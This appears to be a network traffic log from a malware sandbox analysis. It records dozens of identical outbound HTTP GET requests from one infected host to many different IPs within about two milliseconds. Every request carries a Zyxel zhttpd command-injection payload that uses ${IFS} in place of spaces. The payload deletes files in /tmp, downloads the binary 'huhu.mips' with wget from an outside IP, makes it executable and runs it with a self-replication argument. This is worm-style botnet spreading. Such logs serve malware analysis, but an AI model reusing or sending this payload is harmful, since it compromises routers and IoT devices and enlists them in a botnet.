                                                Jan 29, 2024 07:07:54.469314098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5830192.168.2.2359102159.13.36.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469352007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5831192.168.2.2350480223.210.44.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469386101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5832192.168.2.2360098209.16.90.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469440937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5833192.168.2.2358274187.127.224.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469497919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5834192.168.2.2359650141.238.173.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469525099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5835192.168.2.2353134100.37.168.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469564915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5836192.168.2.2334228118.152.77.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469600916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5837192.168.2.2335908168.10.126.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469635010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5838192.168.2.2342936219.46.97.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469691038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5839192.168.2.235375696.2.239.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469727039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5840192.168.2.2356382179.34.23.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469767094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5841192.168.2.2334542180.176.219.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469810963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5842192.168.2.235606219.4.209.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469835997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5843192.168.2.2341044189.186.140.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469890118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5844192.168.2.234011262.237.206.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469907045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5845192.168.2.2342060106.58.200.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.469949961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5846192.168.2.2340478198.61.91.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470014095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5847192.168.2.2342530187.254.208.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470046997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5848192.168.2.2342690189.136.251.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470082045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5849192.168.2.233407664.234.123.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470124006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5850192.168.2.2351080144.194.192.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470180035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5851192.168.2.233352450.199.103.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470247984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5852192.168.2.2343382104.186.135.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470248938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5853192.168.2.23445609.9.221.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470285892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5854192.168.2.2348424101.173.136.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470313072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5855192.168.2.235722859.90.51.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470367908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5856192.168.2.2360856138.215.154.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470392942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5857192.168.2.233735212.192.176.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470454931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5858192.168.2.2347774210.38.59.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470496893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5859192.168.2.234090648.25.55.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470531940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5860192.168.2.235015063.140.173.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470613003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5861192.168.2.2342038183.124.84.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470613956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5862192.168.2.2333578216.62.7.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470662117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5863192.168.2.235728459.110.49.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470710039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5864192.168.2.2359876200.72.83.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470757008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5865192.168.2.234540632.42.96.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470792055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5866192.168.2.2358936147.165.36.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470849037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5867192.168.2.235059872.45.71.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470873117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5868192.168.2.235842260.80.29.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470905066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5869192.168.2.234830043.72.32.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470951080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5870192.168.2.2357258152.81.207.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.470988989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5871192.168.2.235250046.143.70.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471019030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5872192.168.2.235973099.148.198.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471050978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5873192.168.2.234218865.81.0.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471085072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5874192.168.2.234022083.39.190.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471107960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5875192.168.2.2337584220.240.30.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471127987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5876192.168.2.2345292116.247.8.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471214056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5877192.168.2.2347384219.97.230.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471226931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5878192.168.2.2333878189.3.76.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471270084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5879192.168.2.233590061.52.49.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471295118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5880192.168.2.2349278145.224.228.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471323967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5881192.168.2.234773235.37.199.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471360922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5882192.168.2.2349398143.75.41.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471396923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5883192.168.2.2357364203.96.227.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471451044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5884192.168.2.234865871.78.249.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471493006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5885192.168.2.2351780197.175.218.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471504927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5886192.168.2.2356818222.164.102.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471538067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5887192.168.2.2347426122.107.177.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471569061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5888192.168.2.2347000139.8.6.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471585989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5889192.168.2.235841440.15.104.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471621990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5890192.168.2.234682853.9.126.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471693039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5891192.168.2.235613069.190.235.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471728086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5892192.168.2.234179013.72.25.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.471791983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5893192.168.2.234943497.33.34.139443
                                                TimestampBytes transferredDirectionData
